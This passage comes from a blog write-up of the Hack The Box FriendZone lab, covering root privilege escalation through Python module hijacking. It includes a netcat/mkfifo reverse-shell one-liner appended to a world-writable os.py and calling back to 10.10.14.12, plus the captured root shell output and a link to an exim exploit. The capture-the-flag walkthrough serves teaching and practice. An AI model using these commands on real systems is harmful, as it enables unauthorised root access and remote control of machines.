2020/10/10 14:06:01 CMD: UID=0    PID=1231   | /usr/bin/python /opt/server_admin/reporter.py 
2020/10/10 14:06:01 CMD: UID=0    PID=1230   | /bin/sh -c /opt/server_admin/reporter.py 
2020/10/10 14:06:01 CMD: UID=0    PID=1229   | /usr/sbin/CRON -f

There is this script that is running as root.

friend@FriendZone:/opt/server_admin$ cat reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

If we also run LinEnum we can find that os.py is a file writable by all.

...
[-] Files not owned by user but writable by group:
-rwxrw-rw- 1 nobody nogroup 46631 Oct 10 18:36 /etc/Development/LinEnum.sh
-rwxrw-rw- 1 nobody nogroup 5490 Oct 10 17:42 /etc/Development/shell.php
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
...

I can modify the os.py file and add a reverse shell at the end so when the module is imported by the script it’ll execute my reverse shell (we can hijack its execution – module hijacking)

friend@FriendZone:~$ echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py

$ nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 60540
/bin/sh: 0: can't access tty; job control turned off
#

#whoami

root

#cd /root

#cat root.txt

b0e6XXXXXXXXXXXXXXXXXXXXXXXXXXXX

htb

Una respuesta a “HTB Friendzone”

Pti Rasta dice:

diciembre 20, 2020 a las 10:29

Also, exim is vulnerable for privesc
https://www.exploit-db.com/exploits/46996

Responder

/sec/rffuste

Rffuste blog

Pages

Recent entries

Categories

Search

HTB Friendzone

Una respuesta a “HTB Friendzone”

Deja una respuesta Cancelar la respuesta

/sec/rffuste

Rffuste blog

Pages

Recent entries

Categories

Tags

Search

HTB Friendzone

Comparte esto:

Una respuesta a “HTB Friendzone”

Deja una respuesta Cancelar la respuesta